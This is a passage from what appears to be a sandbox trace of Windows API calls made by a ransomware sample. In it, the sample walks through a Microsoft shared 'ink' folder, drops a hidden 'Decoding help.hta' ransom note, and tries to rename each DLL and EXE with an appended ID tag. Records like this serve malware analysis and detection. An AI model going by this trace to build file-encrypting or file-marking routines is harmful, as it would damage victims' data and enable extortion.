ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa060a95, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0xa21d9876, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HWRCustomization", cAlternateFileName="HWRCUS~1")) returned 1 [0042.684] lstrcmpW (lpString1=".", lpString2="HWRCustomization") returned -1 [0042.684] lstrcmpW (lpString1="..", lpString2="HWRCustomization") returned -1 [0042.684] lstrcmpiW (lpString1="windows", lpString2="HWRCustomization") returned 1 [0042.684] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.684] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="HWRCustomization" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization" [0042.684] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\HWRCustomization\\*.*" [0042.684] GlobalMemoryStatus (in: lpBuffer=0x14e5fd10 | out: lpBuffer=0x14e5fd10) [0042.684] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d26a80, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x668 [0042.688] CloseHandle (hObject=0x668) returned 1 [0042.688] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2aad17fd, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2aad17fd, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x959f4c70, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x43200, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0042.688] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.689] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.689] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0xffffffff [0042.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668 [0042.689] WriteFile (in: hFile=0x668, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x14e5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x14e5fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.690] CloseHandle (hObject=0x668) returned 1 [0042.690] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkDiv.dll") returned -1 [0042.690] lstrlenW (lpString="InkDiv.dll") returned 10 [0042.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="InkDiv.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" [0042.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" [0042.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkDiv.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkdiv.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.691] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x56787bbf, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x56787bbf, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x959f4c70, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x159800, dwReserved0=0x0, dwReserved1=0x0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0042.691] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.691] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.691] lstrcmpiW (lpString1="Decoding help.hta", lpString2="InkObj.dll") returned -1 [0042.691] lstrlenW (lpString="InkObj.dll") returned 10 [0042.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.691] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="InkObj.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" [0042.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" [0042.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\InkObj.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\inkobj.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.691] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67731975, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x67731975, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x96f16ef0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0xe4a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="journal.dll", cAlternateFileName="")) returned 1 [0042.691] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.691] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.691] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.692] lstrcmpiW (lpString1="Decoding help.hta", lpString2="journal.dll") returned -1 [0042.692] lstrlenW (lpString="journal.dll") returned 11 [0042.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="journal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" [0042.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" [0042.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\journal.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\journal.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.692] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36a95f54, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x36a95f54, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x99e8b5f0, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x151e00, dwReserved0=0x0, dwReserved1=0x0, cFileName="micaut.dll", cAlternateFileName="")) returned 1 [0042.692] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.692] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.692] lstrcmpiW (lpString1="Decoding help.hta", lpString2="micaut.dll") returned -1 [0042.692] lstrlenW (lpString="micaut.dll") returned 10 [0042.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.692] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="micaut.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" [0042.692] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" [0042.692] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.692] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\micaut.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\micaut.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.709] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcfa822ba, ftCreationTime.dwHighDateTime=0x1ca040b, ftLastAccessTime.dwLowDateTime=0xcfa822ba, ftLastAccessTime.dwHighDateTime=0x1ca040b, ftLastWriteTime.dwLowDateTime=0xcc41afc5, ftLastWriteTime.dwHighDateTime=0x1ca0421, nFileSizeHigh=0x0, nFileSizeLow=0x7c000, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Ink.dll", cAlternateFileName="")) returned 1 [0042.709] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.709] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.709] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.709] lstrcmpiW (lpString1="Decoding help.hta", lpString2="Microsoft.Ink.dll") returned -1 [0042.709] lstrlenW (lpString="Microsoft.Ink.dll") returned 17 [0042.709] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.709] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" [0042.709] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" [0042.709] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.709] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Microsoft.Ink.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\microsoft.ink.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.709] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb19b39d9, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xb19b39d9, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xb1a25dfa, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x12a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="mip.exe", cAlternateFileName="")) returned 1 [0042.710] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.710] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.710] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mip.exe") returned -1 [0042.710] lstrlenW (lpString="mip.exe") returned 7 [0042.710] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.710] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="mip.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" [0042.710] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" [0042.710] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]" [0042.710] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\mip.exe.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\mip.exe.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0042.712] FindNextFileW (in: hFindFile=0x671530, lpFindFileData=0x14e5fd30 | out: lpFindFileData=0x14e5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2d2644b3, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x2d2644b3, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0x9b490940, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x5fe000, dwReserved0=0x0, dwReserved1=0x0, cFileName="mraut.dll", cAlternateFileName="")) returned 1 [0042.712] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.712] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.712] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" [0042.712] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0042.712] lstrcmpiW (lpString1="Decoding help.hta", lpString2="mraut.dll") returned -1 [0042.712] lstrlenW (lpString="mraut.dll") returned 9 [0042.712] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*" [0042.712] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\*.*") returned 64 [0042.712] lstrcatW (in: 